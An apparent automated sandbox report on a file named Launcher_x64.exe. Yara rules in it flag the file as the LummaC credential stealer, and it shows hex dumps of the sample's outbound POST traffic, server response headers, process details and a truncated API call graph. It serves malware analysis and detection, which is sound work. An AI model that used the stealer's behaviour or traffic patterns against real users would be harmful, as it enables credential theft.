                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 11 68 a9 54 33 45 fd ee 92 1f 1d 7e 98 16 78 b2 c4 74 cd d4 d2 34 53 a1 8b b0 e5 66 9e 1b b3 f8 5a 34 5e c4 21 46 ee e0 b5 e7 a3 96 f6 a1 53 c7 76 e9 5d c6 24 b2 84 6b b5 2f 95 4d 0d 14 2c 6d 76 b6 bb 0c 32 11 5a 0b c7 cf 3b ab 9a 59 7f 4a 0a f0 6d 21 43 72 f4 54 07 d7 eb 04 a5 32 8c ff 14 f1 f2 65 cd 0b 42 cf 28 0f a9 c2 ad 85 a8 48 45 ee b4 93 e2 4e d6 03 e5 28 9b 08 d4 38 61 51 6b 3e 8e 14 7f ca 00 65 14 19 e4 4d ea d3 a2 b2 c9 73 c8 f0 dd b2 72 da 39 5a f1 60 f5 08 ee 44 1b 1e 98 49 35 7d 13 06 86 65 a8 72 22 28 de fc 70 f0 45 fc 3c 6c 9b ea dd 6f bf 12 a1 bb 9e f2 4f 1d 0a f0 56 5e 66 6e 08 7f ef d2 02 62 9c e1 a9 37 15 5b eb d3 d5 1e b7 94 f5 3b 8d 59 87 70 49 a5 c0 58 76 c1 f9 ba ec 02 02 b0 34 53 d1 04 b0 b6 99 f9 45 6a 81 9c 6a b3 09 b1 73 1f 55
                                                                                                                                                                                                                                                                                      Data Ascii: hT3E~xt4SfZ4^!FSv]$k/M,mv2Z;YJm!CrT2eB(HEN(8aQk>eMsr9Z`DI5}er"(pE<loOV^fnb7[;YpIXv4SEjjsU
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 7f 67 74 08 d7 96 ea ac 78 ec aa 40 b6 43 37 25 a5 46 1f 1b bd 11 3b 30 99 d9 a6 72 d6 43 ee 2a a9 b5 21 d2 67 50 87 eb 3d 94 16 19 92 2f c1 30 68 6c 52 1d c2 62 a3 18 b8 19 a9 d6 f3 94 6b e6 fa 25 26 04 49 57 52 6c 68 59 22 81 7f f2 f0 0c e6 c0 45 8a f6 81 fb db ef da 8b 2d e7 1e 7e e6 8d ea 8c 73 f3 77 6b 45 c1 0d eb 99 69 c2 0f 9d cb a0 fc bb ae 84 71 4c b8 3d 16 26 42 81 7a 41 e1 7d 10 dd 67 3a 78 b5 ec eb cd 38 d7 b1 d2 82 dc 2a 75 2d 74 e6 a9 e4 a9 53 1b 8b e7 8a 07 77 73 ca 79 d3 af 25 cd 6d a3 a1 2d 02 e6 ad 2c 75 4a e8 10 dd f0 3a 7f 91 87 9b 20 a0 4f 6d 69 fb e1 09 d6 4f 7f 3e 7f 63 3f c3 3b 3e 4a e4 a9 ac 58 55 16 38 a0 59 7e c3 c1 7e 31 35 b4 a0 d5 3e 00 68 01 35 5e 73 b3 3c 5e ea 38 c9 e3 24 df f0 08 8d b7 90 fe 3f c6 f7 df 4b 89 80 9e e3 40
                                                                                                                                                                                                                                                                                      Data Ascii: gtx@C7%F;0rC*!gP=/0hlRbk%&IWRlhY"E-~swkEiqL=&BzA}g:x8*u-tSwsy%m-,uJ: OmiO>c?;>JXU8Y~~15>h5^s<^8$?K@
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 69 7a 0c 86 89 0d 73 55 ba f7 23 00 76 e7 f6 5d e5 ae c6 f9 32 8d 38 aa f6 b7 bb 01 62 91 38 d4 75 d9 a2 0a c4 f7 d1 9a 34 d9 34 2f 03 23 97 92 25 e1 d0 eb 3b ae 3e cf 84 ab ca 19 ce a7 c4 65 ea cd b9 16 18 13 28 29 12 9f 66 30 73 0f 9a a8 21 7f fe 23 ac 8f 09 e8 ca 1a 4a fe e2 d7 e9 6d 8e cd 2d 30 6e 99 70 5b 4b 6d ed 81 f5 b3 78 c2 83 5b 4b c6 43 98 3c 8b a2 dc b7 35 fb 5b d8 63 93 9a 88 53 3d 66 93 0a b2 21 36 3a 43 6b 60 05 1f 45 ac a5 15 f7 b7 7e 8d 54 2c 28 c6 10 71 3b 71 09 5a 28 38 aa 58 f4 bd 8a 97 8f d4 43 35 e3 33 03 80 e8 d0 fb 28 8a 2a ef 99 f2 5c f4 ce 6d e7 d8 30 5d 53 6a 1c a5 ac 2e 8a 9c e9 19 a6 40 d5 e8 1d af 92 db 84 e0 b8 47 14 8c ea f7 6e 2e 80 2d a9 e9 ce 40 92 63 f2 2a 65 18 cb 24 27 06 48 dc dd e5 c2 3e cf 0f 82 7b 0f a8 a0 62 42
                                                                                                                                                                                                                                                                                      Data Ascii: izsU#v]28b8u44/#%;>e()f0s!#Jm-0np[Kmx[KC<5[cS=f!6:Ck`E~T,(q;qZ(8XC53(*\m0]Sj.@Gn.-@c*e$'H>{bB
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 24 e9 0d b5 cd 84 74 49 65 9a ec 3f af 0d ac cd b1 79 f3 34 11 81 db 3b 71 15 5c 98 b1 2b 61 17 6b 0e 61 7d 15 9d 22 fc b7 af c9 e9 b6 2c ff 9b 57 78 fe f0 c6 1b df 4b 98 69 6b 4e cd e1 94 8e f7 89 98 d9 53 44 7e fe f7 26 69 07 89 19 c2 79 42 a6 c2 90 fc f8 ea 19 17 0c d7 70 c9 8f e0 d7 c2 5d 3d 48 03 6c 2c 07 e6 1d f9 63 e9 67 5c f7 b9 38 f4 df 64 ee 1e a5 51 29 54 38 4f cb 5f 45 86 7b 6d 96 b7 ec 64 21 e7 c6 04 68 ef 26 48 0e 3b 47 4d b2 ff 5e 17 1d f0 5d 70 d9 2f 91 9f 85 cb 8c 5d 04 40 6a 92 fd f7 d1 14 e6 99 1e 48 e4 9b 48 fd 74 00 df c0 b5 6b 58 13 a5 74 4a d8 85 11 45 c8 85 6f d7 4c a5 e9 49 32 b8 79 01 b6 22 8c 19 98 f7 b9 ee c1 4f f2 88 4e bd 78 46 33 fc e0 eb ea c8 3c 8c f3 65 be da d1 66 aa 8f 0e 28 bb d6 5d b1 75 d6 8f db 71 26 6f d9 c5 c9 4a
                                                                                                                                                                                                                                                                                      Data Ascii: $tIe?y4;q\+aka}",WxKikNSD~&iyBp]=Hl,cg\8dQ)T8O_E{md!h&H;GM^]p/]@jHHtkXtJEoLI2y"ONxF3<ef(]uq&oJ
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 54 cc 80 95 3b fe ee b1 b6 ed bb cc f2 db 86 86 86 de 47 51 c1 09 88 59 01 62 d9 d6 4b ba 62 57 a9 5e cf 27 8e dc 5a b4 dd fe 28 3d 8a ea 3a 1e ec 4a 18 d3 5a a8 9b cf 65 62 67 7b 06 3c 73 2a 55 31 ae 61 b6 93 1c f8 df f2 28 be 45 b1 3e f4 0c 5f 94 a9 48 bc 65 6d df 4f 46 08 b6 a9 f5 55 e5 2c 67 17 28 f5 31 ea e7 7c 5f ef f0 22 22 4c a3 4c 1a 22 dc a6 1b ff 9a 65 1d 6a c1 88 31 14 9f 44 88 63 bb 86 7c 6f f4 87 11 88 84 fc 7e 44 ca 3b 69 6a fa 74 ae 20 2d 81 75 33 63 81 68 16 7a 48 56 43 6b 47 4a 5b 72 77 d7 60 6e 51 2b 82 98 88 58 8d 98 7f 1b b4 f7 bb 91 7f 95 cb eb df 1f f2 d7 6d bf 04 2d 55 92 59 21 53 7b 57 21 1b 34 5e 7f d2 aa 9f 1a 32 dc 02 76 7d 2e b1 34 15 66 0f 6d 46 f7 70 1c 98 39 8b 7b dd 99 2a 1d ca 5e bb 04 3a fe 11 46 a7 bc b2 38 c4 15 e2 18
                                                                                                                                                                                                                                                                                      Data Ascii: T;GQYbKbW^'Z(=:JZebg{<s*U1a(E>_HemOFU,g(1|_""LL"ej1Dc|o~D;ijt -u3chzHVCkGJ[rw`nQ+Xm-UY!S{W!4^2v}.4fmFp9{*^:F8
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: fe 3f d3 38 b4 ff 20 a0 6c 59 10 ce 7e b6 1f 09 af b5 18 5e fe df a1 1d 00 da 97 b0 dc a7 7f 11 45 7d 45 c1 f1 72 65 f5 03 cd 56 40 f2 46 74 da 69 76 f1 fc 99 1d b6 dc a6 d8 98 4c a9 06 9a a6 24 2d 6c d2 4d 92 65 a6 b3 bd 9f dd ab 5a 14 7c 09 57 ab c3 90 e4 33 d7 5a 88 4e 34 f7 68 40 e0 65 7e 9f 16 83 fd ee f3 7a 0a e1 5c 14 89 df 55 3f 81 a3 66 2b 05 b5 44 41 d4 8f 53 44 19 3e 2b b1 48 51 77 70 f3 fe 8d aa 10 57 93 f2 37 db 2a 08 12 3a 5c e7 25 9f 87 45 97 bc 49 66 fc 96 b0 c0 ed f8 96 15 bd e8 98 2d 07 47 7a 1a 1a 4e e1 64 a3 95 03 4a 08 04 c2 f3 50 1e 26 00 53 f3 ca b3 c8 8e 73 b8 9c d3 35 bc 7c 3c fc 65 31 87 1c fd 59 3d 7a f0 26 ab 6a cd 67 3d 5d 9f d3 0d 9a 56 3a 4f d5 fc 3a cc b9 e5 9f 69 f3 9a 81 e1 6f 15 bc 49 4c 51 66 bf cf 23 f9 8f ef 7f 5d e4
                                                                                                                                                                                                                                                                                      Data Ascii: ?8 lY~^E}EreV@FtivL$-lMeZ|W3ZN4h@e~z\U?f+DASD>+HQwpW7*:\%EIf-GzNdJP&Ss5|<e1Y=z&jg=]V:O:ioILQf#]
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 56 95 c0 27 7c 52 ed ce 32 4d 9b 62 c1 c0 e6 34 e0 34 b9 c5 d3 fd 9c 66 d7 6d 5f f6 59 c9 64 13 e2 75 fc 38 7f b5 24 f8 74 86 d1 5d 5c c2 5e b6 ff 46 85 80 5e 51 e2 43 e7 fa d0 9e e5 38 df 66 8e ab 41 41 84 e1 93 08 fc fa db 90 24 9b b6 6f 51 c5 fe ba a4 86 8e 01 0b 72 c3 88 40 ad 71 74 44 e6 27 65 74 a4 4e a7 67 97 ff 93 3f 67 91 42 6a ae 25 97 b0 7a 83 f2 9b 39 aa e5 4f 91 fe b0 e7 f6 d8 90 7b 66 a6 3a 9e e7 ab 82 ca 54 92 3d ed 92 b8 b0 03 4d d7 5c 89 8e f2 99 5e 56 16 ad d7 e2 e5 9f 4b a1 bf 3c 9b 28 09 d4 9e f3 e9 16 00 3c a9 b9 4e 8f d3 e2 31 31 ce 2e bf 58 7f 08 9f 71 50 d4 bb 29 30 b0 4c ec 66 d3 e3 73 8f a4 a8 30 8c c4 ed 7a 01 d1 cd d3 2f 94 b9 ee 04 40 c0 df fa 96 6c 50 9f 32 c8 1d 2c d7 f9 89 85 c0 ba f6 e1 fe 3f fd 42 e9 07 24 bd 7d 2c 30 e2
                                                                                                                                                                                                                                                                                      Data Ascii: V'|R2Mb44fm_Ydu8$t]\^F^QC8fAA$oQr@qtD'etNg?gBj%z9O{f:T=M\^VK<(<N11.XqP)0Lfs0z/@lP2,?B$},0
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 65 79 5f 04 b0 1d 70 17 07 3f 39 72 f3 bd b1 69 7c 98 57 9b d3 90 67 2e bd 50 86 6f e1 47 37 98 79 b3 a9 f5 9e ad c3 17 4f e5 32 b6 c9 9d a0 0c e2 f8 04 08 42 54 14 5c b6 3b 4b 74 8d 1f 8c 9b 7b 9b e4 23 08 09 08 bd ca f8 2f 7d 07 06 78 6c 51 55 90 ae f0 4f fb 7b 4c fa 14 fa f2 13 9c 7a 73 26 1a c7 4c 0a d5 bb 17 07 23 18 80 57 d3 f0 d6 c8 7b e3 2b 22 2d 43 bd a7 02 e3 3c 45 54 6f 1a df 58 43 3f 59 e1 63 51 4d 8c 00 5a b5 75 d1 66 80 a0 de 34 b2 cd e2 fe c8 c0 3a 75 50 52 ed fd 45 d2 2a ad f8 ea f2 bc 06 62 3e 21 d0 84 db 83 7f ad 8f 98 11 ed 3c d7 bc bb 91 3f 61 33 53 7c 2d dc e6 a2 2c 3c 94 61 41 d4 0c 3b 4f dd 21 af f5 74 9c bf 20 1b 2c 4d af f5 7e 8b d6 82 9e 48 fd 19 7f 74 bb 29 32 69 f4 7d b9 95 c5 bd 08 f2 e9 b8 e2 7b d4 7d e3 6e 35 f6 8a f1 f2 04
                                                                                                                                                                                                                                                                                      Data Ascii: ey_p?9ri|Wg.PoG7yO2BT\;Kt{#/}xlQUO{Lzs&L#W{+"-C<EToXC?YcQMZuf4:uPRE*b>!<?a3S|-,<aA;O!t ,M~Ht)2i}{}n5
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: c4 89 40 1d 1e 8e d2 17 83 ad 4f 86 e3 80 62 35 b8 1b ea 7f c6 68 b7 a7 ab 5a 66 ea d0 34 b5 ff 30 77 6a 4c e9 44 56 b2 53 49 60 96 0a b8 76 f8 70 9f bc 52 ec 42 ed aa 80 8a 5e ca 52 63 fa ae 0c 45 3e dc 7f 35 f6 5a 57 b2 fa e5 56 6d f1 ed 42 4a b7 2e 15 22 69 9e 63 62 bb 2e 16 86 5f 70 f1 19 0b 55 bf 9b 10 5d 53 f1 06 41 cb 7e 07 58 7d aa 72 37 b1 86 81 02 57 3d 29 aa 52 f3 96 e2 b6 79 38 bd d1 93 c6 bc fc dc 3f 03 6e af bd 71 5d 9e d0 73 6f 19 d0 ea 89 5e c5 80 33 6b b2 71 f0 ed f3 4d 94 da 18 f8 da 73 f7 a9 d3 ba e7 81 de 76 e8 9f e1 b8 fd 40 ef a6 98 5d 98 ed 29 e2 bf 3b 2a af 7d 2f 93 97 6a a9 0e 46 54 28 ca 5d 84 28 7b d5 7b 5a 62 4e 3a 61 07 e3 1c d8 4d cd 69 5a dc cd 5f fb 4f cf 60 95 60 41 a0 2f bf 2d 07 0d a3 42 f9 c6 7d c0 98 a4 87 01 db 61 b2
                                                                                                                                                                                                                                                                                      Data Ascii: @Ob5hZf40wjLDVSI`vpRB^RcE>5ZWVmBJ."icb._pU]SA~X}r7W=)Ry8?nq]so^3kqMsv@]);*}/jFT(]({{ZbN:aMiZ_O``A/-B}a
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:31 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=in6scgf6o97qgs0edif1avhqei; expires=Thu, 17 Apr 2025 18:05:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xETsEUYmbJGt6ozXMCH82t9dwzkPREB%2FaPnm0Q3ROUT9XptmdBzXDRbZOGzgrVIRAGs%2FRi1jeOast6enT7oS3E8hTre953whn9LpdHCrDGs2JNxYpE4C0JcNr7n3o6gQJyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642cb44dab0f95-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1644&rtt_var=623&sent=312&recv=595&lost=0&retrans=0&sent_bytes=2834&recv_bytes=567473&delivery_rate=1748502&cwnd=169&unsent_bytes=0&cid=f8421cea7f3c1feb&ts=2922&x=0"


                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:19:17:03
                                                                                                                                                                                                                                                                                      Start date:22/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xd00000
                                                                                                                                                                                                                                                                                      File size:575'488 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:A467477E289901E8C45912F98FC56CD2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                      Start time:19:17:03
                                                                                                                                                                                                                                                                                      Start date:22/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                      Start time:19:17:04
                                                                                                                                                                                                                                                                                      Start date:22/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xd00000
                                                                                                                                                                                                                                                                                      File size:575'488 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:A467477E289901E8C45912F98FC56CD2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                      Start time:19:17:04
                                                                                                                                                                                                                                                                                      Start date:22/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xd00000
                                                                                                                                                                                                                                                                                      File size:575'488 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:A467477E289901E8C45912F98FC56CD2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                                                                                                                                                                                        Signature Coverage:3.1%
                                                                                                                                                                                                                                                                                        Total number of Nodes:521
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                                                                                                                                                                        execution_graph 22357 d0d2d0 62 API calls 22261 d1f4d5 7 API calls 22262 d0acc0 48 API calls 22361 d286cb 44 API calls 3 library calls 22362 d24ace 34 API calls 2 library calls 22266 d030f0 31 API calls std::_Throw_Cpp_error 22363 d0aef0 125 API calls 22365 d28ef6 29 API calls 3 library calls 22269 d120fd 33 API calls std::_Throw_Cpp_error 22270 d0b4e0 29 API calls std::_Throw_Cpp_error 22370 d02290 103 API calls 22273 d11c90 LCMapStringEx __Towlower 22372 d12693 DeleteCriticalSection 22373 d28a9d 41 API calls 3 library calls 22275 d19889 47 API calls 4 library calls 22276 d178b1 8 API calls 22277 d170bb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 22278 d16cbb GetModuleHandleW GetProcAddress GetProcAddress 22379 d13eba 69 API calls codecvt 22380 d24abc GetProcessHeap 22382 d1a6a3 66 API calls 22279 d23ca7 FreeLibrary 22283 d14059 70 API calls 22386 d22259 55 API calls 2 library calls 22286 d0b440 39 API calls 22387 d07240 49 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22388 d11e40 20 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22391 d12a4c 9 API calls 3 library calls 22393 d11a70 GetStringTypeW __Getwctype 21817 d17074 21826 d164d5 GetModuleHandleW 21817->21826 21820 d170b2 21829 d1c9d3 21 API calls std::locale::_Setgloballocale 21820->21829 21821 d17080 21822 d1708b 21821->21822 21828 d1c9f8 21 API calls std::locale::_Setgloballocale 21821->21828 21825 d170ba 21827 d164e1 21826->21827 21827->21820 21827->21821 21828->21822 21829->21825 22394 d16e74 60 API calls 2 library calls 22288 d2507c LeaveCriticalSection std::_Lockit::~_Lockit 22397 d14665 16 API calls 22293 d16815 DecodePointer 22401 d03200 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 22295 d11c00 6 API calls 2 library calls 22402 d11a00 6 API calls 2 library calls 22404 d0c230 62 API calls 22297 d13c33 47 API calls 2 library calls 22405 d1663d 49 API calls _unexpected 22406 d1fe20 36 API calls 2 library calls 22300 d2e825 49 API calls 22302 d1a02c GetCommandLineA GetCommandLineW 22304 d13dd2 45 API calls 2 library calls 22410 d19fd4 73 API calls 2 library calls 22305 d281d4 11 API calls __Getctype 22416 d233cd 16 API calls __dosmaperr 22417 d02bf0 30 API calls 21650 d12b92 21673 d12b03 GetModuleHandleExW 21650->21673 21654 d12b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21656 d12bde 21654->21656 21658 d12bff 21656->21658 21695 d12ae6 GetModuleHandleExW 21656->21695 21675 d0e620 21658->21675 21659 d12bd8 21659->21654 21661 d12bef 21661->21658 21662 d12bf5 FreeLibraryWhenCallbackReturns 21661->21662 21662->21658 21664 d12b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21665 d12c15 21664->21665 21666 d12c43 21665->21666 21667 d0b920 47 API calls 21665->21667 21668 d12c21 21667->21668 21669 d15c60 ReleaseSRWLockExclusive 21668->21669 21670 d12c34 21669->21670 21670->21666 21696 d156ac WakeAllConditionVariable 21670->21696 21674 d12b19 21673->21674 21674->21659 21684 d0b920 21674->21684 21697 d04f90 21675->21697 21677 d0e641 std::_Throw_Cpp_error 21701 d0f590 21677->21701 21680 d0e66f 21709 d12303 21680->21709 21682 d0e679 21682->21664 21685 d0b934 std::_Throw_Cpp_error 21684->21685 21796 d15c4f 21685->21796 21689 d0b951 21690 d0b96d 21689->21690 21800 d12d23 40 API calls 2 library calls 21689->21800 21692 d15c60 21690->21692 21693 d15c7b 21692->21693 21694 d15c6d ReleaseSRWLockExclusive 21692->21694 21693->21659 21694->21693 21695->21661 21696->21666 21698 d04fc0 21697->21698 21699 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21698->21699 21700 d04fcd 21699->21700 21700->21677 21702 d04f90 5 API calls 21701->21702 21703 d0f5b1 std::_Throw_Cpp_error 21702->21703 21716 d103e0 21703->21716 21704 d0f5c3 21705 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21704->21705 21706 d0e667 21705->21706 21708 d0e6b0 CloseThreadpoolWork std::_Throw_Cpp_error 21706->21708 21708->21680 21710 d1230b 21709->21710 21711 d1230c IsProcessorFeaturePresent 21709->21711 21710->21682 21713 d16086 21711->21713 21795 d1616c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21713->21795 21715 d16169 21715->21682 21717 d103f7 21716->21717 21722 d10530 21717->21722 21719 d103fe std::_Throw_Cpp_error 21721 d10406 21719->21721 21729 d105f0 21719->21729 21721->21704 21734 d0d930 21722->21734 21724 d10557 21737 d0da60 21724->21737 21727 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21728 d105b1 21727->21728 21728->21719 21744 d10630 21729->21744 21732 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21733 d10620 21732->21733 21733->21721 21735 d0b920 47 API calls 21734->21735 21736 d0d94e 21735->21736 21736->21724 21740 d0b9d0 21737->21740 21741 d0b9e1 std::_Throw_Cpp_error 21740->21741 21742 d15c60 ReleaseSRWLockExclusive 21741->21742 21743 d0b9e9 21742->21743 21743->21727 21745 d10651 21744->21745 21754 d10800 21745->21754 21747 d10691 21757 d10790 21747->21757 21751 d106b7 21752 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21751->21752 21753 d10613 21752->21753 21753->21732 21764 d10940 21754->21764 21756 d10820 21756->21747 21758 d107b4 21757->21758 21779 d108d0 21758->21779 21760 d107cf 21761 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21760->21761 21762 d106a1 21761->21762 21763 d106d0 134 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 21762->21763 21763->21751 21765 d10971 21764->21765 21770 d109b0 21765->21770 21767 d10984 21768 d12303 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 21767->21768 21769 d1099b 21768->21769 21769->21756 21771 d109c7 21770->21771 21774 d109f0 21771->21774 21773 d109d5 21773->21767 21775 d10a0d 21774->21775 21777 d10a15 Concurrency::details::_ContextCallback::_CallInContext 21775->21777 21778 d10a40 31 API calls 2 library calls 21775->21778 21777->21773 21778->21777 21780 d108e4 Concurrency::details::_ContextCallback::_CallInContext 21779->21780 21781 d108ec Concurrency::details::_ContextCallback::_CallInContext 21780->21781 21788 d12eaa RaiseException Concurrency::cancel_current_task 21780->21788 21785 d10b60 21781->21785 21789 d10c00 21785->21789 21792 d10c20 21789->21792 21793 d0bdb0 Concurrency::details::_ContextCallback::_CallInContext 125 API calls 21792->21793 21794 d10909 21793->21794 21794->21760 21795->21715 21801 d15c7f GetCurrentThreadId 21796->21801 21799 d12d23 40 API calls 2 library calls 21802 d15ca9 21801->21802 21803 d15cc8 21801->21803 21804 d15cae AcquireSRWLockExclusive 21802->21804 21812 d15cbe 21802->21812 21805 d15cd1 21803->21805 21806 d15ce8 21803->21806 21804->21812 21807 d15cdc AcquireSRWLockExclusive 21805->21807 21805->21812 21808 